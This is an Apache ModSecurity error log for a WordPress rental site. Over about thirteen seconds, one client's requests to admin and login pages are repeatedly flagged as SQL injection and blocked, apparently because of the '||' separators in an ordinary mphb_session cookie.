[Mon May 11 22:28:58.341048 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8Cno_DFxNSZVmaX3R4QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:58.341341 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8Cno_DFxNSZVmaX3R4QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:58.950739 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Cno_DFxNSZVmaX3R4QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:59.633804 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8C3o_DFxNSZVmaX3R4gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:59.634083 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8C3o_DFxNSZVmaX3R4gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:00.230615 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8C3o_DFxNSZVmaX3R4gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:00.442186 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8DHo_DFxNSZVmaX3R5AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:00.442473 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8DHo_DFxNSZVmaX3R5AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:01.023039 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8DHo_DFxNSZVmaX3R5AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:01.721049 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8DXo_DFxNSZVmaX3R5gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:01.721345 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8DXo_DFxNSZVmaX3R5gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:02.077748 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8DXo_DFxNSZVmaX3R5gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:02.760916 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8Dno_DFxNSZVmaX3R6AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:02.761203 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8Dno_DFxNSZVmaX3R6AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:03.404563 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Dno_DFxNSZVmaX3R6AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:04.031724 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8EHo_DFxNSZVmaX3R6wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:04.032005 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8EHo_DFxNSZVmaX3R6wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:04.656382 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8EHo_DFxNSZVmaX3R6wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:05.233027 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8EXo_DFxNSZVmaX3R7gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:05.233315 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8EXo_DFxNSZVmaX3R7gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:05.806479 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8EXo_DFxNSZVmaX3R7gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:06.235829 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8Eno_DFxNSZVmaX3R7wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:06.236128 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8Eno_DFxNSZVmaX3R7wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:06.804353 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Eno_DFxNSZVmaX3R7wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:07.618727 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8E3o_DFxNSZVmaX3R8QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:07.619003 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8E3o_DFxNSZVmaX3R8QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:08.165555 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8E3o_DFxNSZVmaX3R8QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:08.419828 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8FHo_DFxNSZVmaX3R8wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:08.420113 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8FHo_DFxNSZVmaX3R8wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:08.791494 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8FHo_DFxNSZVmaX3R8wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:09.925628 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8FXo_DFxNSZVmaX3R9QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:09.925901 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8FXo_DFxNSZVmaX3R9QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:10.517935 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8FXo_DFxNSZVmaX3R9QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:11.035616 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8F3o_DFxNSZVmaX3R9wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:11.035897 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8F3o_DFxNSZVmaX3R9wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:11.608415 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8F3o_DFxNSZVmaX3R9wAAAMg"], referer: https://rentparadise.fr/wp-login.php
